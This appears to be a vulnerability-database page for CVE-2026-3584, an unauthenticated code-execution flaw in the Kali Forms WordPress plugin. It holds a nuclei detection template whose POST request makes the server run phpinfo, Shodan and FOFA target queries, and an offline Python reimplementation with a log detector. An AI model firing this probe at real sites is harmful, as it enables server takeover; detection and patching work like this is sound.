| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2026-3584 | 20 Mar 2026 21:25 | – | attackerkb |
| CVE-2026-3584 | 20 Mar 2026 22:17 | – | circl |
| WordPress plugin Kali Forms code injection vulnerability | 20 Mar 2026 00:00 | – | cnnvd |
| CVE-2026-3584 | 20 Mar 2026 21:25 | – | cve |
| CVE-2026-3584 Kali Forms <= 2.4.9 - Unauthenticated Remote Code Execution via form_process | 20 Mar 2026 21:25 | – | cvelist |
| EUVD-2026-13814 | 21 Mar 2026 00:31 | – | euvd |
| Exploit for CVE-2026-3584 | 25 Mar 2026 09:21 | – | githubexploit |
| CVE-2026-3584 | 20 Mar 2026 22:16 | – | nvd |
| WordPress Kali Forms 2.4.9 Remote Code Execution | 20 Apr 2026 00:00 | – | packetstorm |
| WordPress Kali Forms plugin <= 2.4.9 - Unauthenticated Remote Code Execution via form_process vulnerability | 23 Mar 2026 10:14 | – | patchstack |
```yaml
id: CVE-2026-3584

info:
  name: WordPress Kali Forms <= 2.4.9 - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    Kali Forms WordPress plugin <= 2.4.9 contains a remote code execution vulnerability caused by unsafe handling of user input in the 'form_process' and 'prepare_post_data' functions, letting unauthenticated attackers execute arbitrary code on the server.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to a version later than 2.4.9.
  reference:
    - https://wordpress.org/plugins/kali-forms/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-3584
    epss-score: 0.07239
    epss-percentile: 0.93576
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 6
    product: kali-forms
    framework: wordpress
    fofa-query: body="kali-forms"
    shodan-query: http.component:"WordPress" http.html:"kali-forms"
  tags: cve,cve2026,wordpress,wp-plugin,kali-forms,rce,unauth,vkev

flow: |
  // Try common form pages until one fingerprints as Kali Forms, then send the probe once.
  var paths = ["/contact-us/", "/contact/", "/form/", "/feedback/", "/"];
  for (var i = 0; i < paths.length; i++) {
    set("form_path", paths[i]);
    if (http(1)) {
      http(2);
      break;
    }
  }

http:
  # Request 1: locate a page embedding a Kali Forms form and harvest the AJAX nonce,
  # the form ID and the plugin version (from the ?ver= query on its assets).
  - raw:
      - |
        GET {{form_path}} HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "KaliFormsObject")'
          - 'contains(body, "ajax_nonce")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'ajax_nonce":"([a-f0-9]+)"'
        internal: true

      - type: regex
        name: form_id
        part: body
        group: 1
        regex:
          - 'data-form-id="(\d+)"'
        internal: true

      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - 'kali-forms/[^"]*(?:js|css)\?ver=([0-9.]+)'
        internal: true

  # Request 2: submit the form through admin-ajax.php with the harvested nonce and form ID,
  # passing "phpinfo" in thisPermalink, and match on phpinfo() output in the response.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=kaliforms_form_process&data[nonce]={{nonce}}&data[formId]={{form_id}}&data[first-name]=test&data[last-name]=user&data[email]=test%40example.com&data[message]=test&data[thisPermalink]=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "phpinfo()</title>"
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_version
        part: body
        group: 1
        regex:
          - 'PHP Version ([0-9.]+)'
# digest: 4a0a0047304502203aa00f646a9b307da9caff214477aa98aa26f0e7754a75e5f33e4b294bfce6dc022100a8aa349dd63d13f38c57e38056c79a58870880d00aa2cf034fca856865a59c84:922c64590222798bb761d5b6d8e72950
```
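As an added example (not part of the Vulners page, the nuclei template, or the plugin's code), the following Python reimplements the template's two-step logic offline: it fingerprints a page with the same markers and regexes, decides from the extracted asset version whether the install falls in the <= 2.4.9 range, builds the admin-ajax.php probe body exactly as the template sends it, and applies the template's success matcher to a response. It also adds a defender-side check that flags a kaliforms_form_process request whose thisPermalink value is not an http(s) URL; that a legitimate submission carries the form page's URL in that field is an assumption drawn from the field name, and the sample HTML and phpinfo page are constructed inputs, not captures from a real site.

```python
"""Offline companion to the nuclei template above: the same fingerprint,
extraction and response-matching logic, plus a defender-side request check.
Added example; not the template author's or the plugin's code. The sample
HTML and phpinfo page below are constructed, not captured from a real site."""
import re
from typing import Optional
from urllib.parse import parse_qs, quote

AFFECTED_MAX = (2, 4, 9)  # advisory: Kali Forms <= 2.4.9 is affected
AJAX_PATH = "/wp-admin/admin-ajax.php"

# Regexes copied from the template's extractors.
NONCE_RE = re.compile(r'ajax_nonce":"([a-f0-9]+)"')
FORM_ID_RE = re.compile(r'data-form-id="(\d+)"')
VERSION_RE = re.compile(r'kali-forms/[^"]*(?:js|css)\?ver=([0-9.]+)')
PHP_VERSION_RE = re.compile(r'PHP Version ([0-9.]+)')

# Constructed page: a Kali Forms embed carrying the markers the template keys on.
SAMPLE_HTML = """<html><head><title>Contact</title>
<script src="/wp-content/plugins/kali-forms/public/js/frontend.js?ver=2.4.9"></script>
<script>var KaliFormsObject = {"ajaxurl":"/wp-admin/admin-ajax.php","ajax_nonce":"3f9a1c2b5d"};</script>
</head><body><form class="kaliforms-form" data-form-id="12"></form></body></html>"""

# Constructed phpinfo() response, reduced to the strings the template matches.
SAMPLE_PHPINFO = ("<html><head><title>phpinfo()</title></head><body>"
                  "<h1>PHP Version 8.1.27</h1><h2>PHP Extension</h2></body></html>")


def fingerprint(body: str) -> Optional[dict]:
    """Request 1 logic: require KaliFormsObject and ajax_nonce in the page, then
    extract the nonce, the form id and (if an asset URL is present) the version."""
    if "KaliFormsObject" not in body or "ajax_nonce" not in body:
        return None
    nonce, form_id = NONCE_RE.search(body), FORM_ID_RE.search(body)
    if not (nonce and form_id):
        return None
    version = VERSION_RE.search(body)
    return {"nonce": nonce.group(1), "form_id": form_id.group(1),
            "version": version.group(1) if version else None}


def is_affected(version: Optional[str]) -> Optional[bool]:
    """None when the version is unknown; otherwise True for <= 2.4.9."""
    if version is None:
        return None
    return tuple(int(p) for p in version.split(".")) <= AFFECTED_MAX


def build_probe(fp: dict, permalink: str = "phpinfo"):
    """Request 2 body in the form the template sends it. Returns (path, body).
    thisPermalink is the field the template abuses; that a normal submission
    carries the form page's URL there is an assumption based on the field name."""
    fields = [("data[nonce]", fp["nonce"]), ("data[formId]", fp["form_id"]),
              ("data[first-name]", "test"), ("data[last-name]", "user"),
              ("data[email]", "test@example.com"), ("data[message]", "test"),
              ("data[thisPermalink]", permalink)]
    body = "action=kaliforms_form_process&" + "&".join(
        f"{k}={quote(v, safe='')}" for k, v in fields)
    return AJAX_PATH, body


def matches_rce(status: int, body: str) -> bool:
    """The template's success matcher: HTTP 200 and all three phpinfo markers."""
    markers = ("phpinfo()</title>", "PHP Extension", "PHP Version")
    return status == 200 and all(m in body for m in markers)


def php_version(body: str) -> Optional[str]:
    """The template's php_version extractor."""
    m = PHP_VERSION_RE.search(body)
    return m.group(1) if m else None


def suspicious_request(method: str, path: str, body: str) -> bool:
    """Defender-side check for WAF or log review: a kaliforms_form_process call
    whose thisPermalink is not an http(s) URL has the shape of this probe.
    Assumption: legitimate submissions put the form page's URL in that field."""
    if method != "POST" or not path.endswith(AJAX_PATH):
        return False
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action") != ["kaliforms_form_process"]:
        return False
    if "data[thisPermalink]" not in params:
        return False
    permalink = params["data[thisPermalink]"][0]
    return not permalink.lower().startswith(("http://", "https://"))


if __name__ == "__main__":
    fp = fingerprint(SAMPLE_HTML)
    print("fingerprint:", fp, "affected:", is_affected(fp["version"]))
    path, body = build_probe(fp)
    print("probe:", path, body)
    print("response matches:", matches_rce(200, SAMPLE_PHPINFO), php_version(SAMPLE_PHPINFO))
    print("flagged by detector:", suspicious_request("POST", path, body))
```

Run it directly to see each step on the constructed samples. The request-shape check is usable as-is over decoded POST bodies from access logs or a WAF; if real traffic shows thisPermalink only ever holds site-local URLs, tighten the URL test to the site's own host.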